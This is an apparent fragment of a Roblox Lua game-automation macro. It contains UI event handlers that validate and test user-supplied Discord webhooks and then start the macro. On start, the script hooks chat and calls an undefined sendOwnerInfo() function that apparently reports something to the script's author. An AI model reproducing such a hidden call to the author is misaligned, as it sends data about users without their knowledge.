local btnY = selH - 46
local backBtn    = mkBtn(selFrame,"◀ Back",8,btnY,math.floor(selW/2)-12,36,Color3.fromRGB(60,60,80))
local confirmBtn = mkBtn(selFrame,"✅ Confirm & Start",math.floor(selW/2)+4,btnY,math.floor(selW/2)-12,36)

--================ EVENTS ================
local function openWbPage()
    wTitle.Text=T("title") wSub.Text=T("sub")
    npcWbLb.Text=T("npcWebhook") bwbLb.Text=T("biomeWebhook")
    vipLb.Text=T("vipLink") nextBtn.Text=T("next")
    wStatus.Text=T("watching")
    npcBox.PlaceholderText=T("npcPlaceholder")
    bwbBox.PlaceholderText=T("biomePlaceholder")
    vipBox.PlaceholderText=T("vipPlaceholder")
    hideFrame(langFrame, function() showFrame(wbFrame) end)
end

engBtn.MouseButton1Click:Connect(function() lang="ENG" openWbPage() end)
thBtn.MouseButton1Click:Connect(function() lang="TH" openWbPage() end)

testNpc.MouseButton1Click:Connect(function()
    local url=npcBox.Text
    if url=="" or not url:find("discord.com/api/webhooks") then
        wStatus.Text=T("errWebhook") wStatus.TextColor3=Color3.fromRGB(255,80,80)
        task.wait(2) wStatus.Text=T("watching") wStatus.TextColor3=Color3.fromRGB(120,120,120) return
    end
    sendSimple(getCurrentTime()..": 🔔 Test NPC!", url)
    wStatus.Text="✅ NPC Test sent!" wStatus.TextColor3=Color3.fromRGB(0,255,100)
    task.wait(2) wStatus.Text=T("watching") wStatus.TextColor3=Color3.fromRGB(120,120,120)
end)

testBio.MouseButton1Click:Connect(function()
    local url=bwbBox.Text
    if url=="" or not url:find("discord.com/api/webhooks") then
        wStatus.Text=T("errBiomeWebhook") wStatus.TextColor3=Color3.fromRGB(255,80,80)
        task.wait(2) wStatus.Text=T("watching") wStatus.TextColor3=Color3.fromRGB(120,120,120) return
    end
    sendSimple(getCurrentTime()..": 🔔 Test Biome!", url)
    wStatus.Text="✅ Biome Test sent!" wStatus.TextColor3=Color3.fromRGB(0,255,100)
    task.wait(2) wStatus.Text=T("watching") wStatus.TextColor3=Color3.fromRGB(120,120,120)
end)

nextBtn.MouseButton1Click:Connect(function()
    local wb=npcBox.Text
    if wb=="" or not wb:find("discord.com/api/webhooks") then
        wStatus.Text=T("errWebhook") wStatus.TextColor3=Color3.fromRGB(255,80,80)
        task.wait(2) wStatus.Text=T("watching") wStatus.TextColor3=Color3.fromRGB(120,120,120) return
    end
    local bwb=bwbBox.Text
    if bwb=="" or not bwb:find("discord.com/api/webhooks") then
        wStatus.Text=T("errBiomeWebhook") wStatus.TextColor3=Color3.fromRGB(255,80,80)
        task.wait(2) wStatus.Text=T("watching") wStatus.TextColor3=Color3.fromRGB(120,120,120) return
    end
    local link=vipBox.Text
    if link=="" or not link:find("roblox.com") then
        wStatus.Text=T("errVip") wStatus.TextColor3=Color3.fromRGB(255,80,80)
        task.wait(2) wStatus.Text=T("watching") wStatus.TextColor3=Color3.fromRGB(120,120,120) return
    end
    webhookUrl=wb biomeWebhookUrl=bwb vipLink=link
    selTitle.Text=T("selectTitle")
    confirmBtn.Text=T("confirm")
    backBtn.Text=T("back")
    hideFrame(wbFrame, function() showFrame(selFrame) end)
end)

backBtn.MouseButton1Click:Connect(function()
    hideFrame(selFrame, function() showFrame(wbFrame) end)
end)

confirmBtn.MouseButton1Click:Connect(function()
    hideFrame(selFrame, function()
        macroRunning=true
        hookChat()
        sendSimple(getCurrentTime()..": Macro started!")
        sendSimple(getCurrentTime()..": Macro started!", biomeWebhookUrl)
        sendOwnerInfo()
        print("✅ G Script's Macro v5.5 started!")
        showStatus(T("running"), Color3.fromRGB(0,255,100))
        if ytLabel then ytLabel.Visible=true end
    end)
end)

print("✅ G Script's Macro v5.5 loaded! -SM=stop | -MS=start")
